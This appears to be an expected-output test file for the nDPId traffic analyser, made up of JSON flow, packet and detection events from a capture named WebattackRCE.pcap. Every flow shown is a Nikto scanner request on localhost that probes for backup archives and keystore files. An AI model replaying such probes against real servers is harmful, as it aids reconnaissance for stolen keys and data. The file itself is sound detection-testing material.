00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
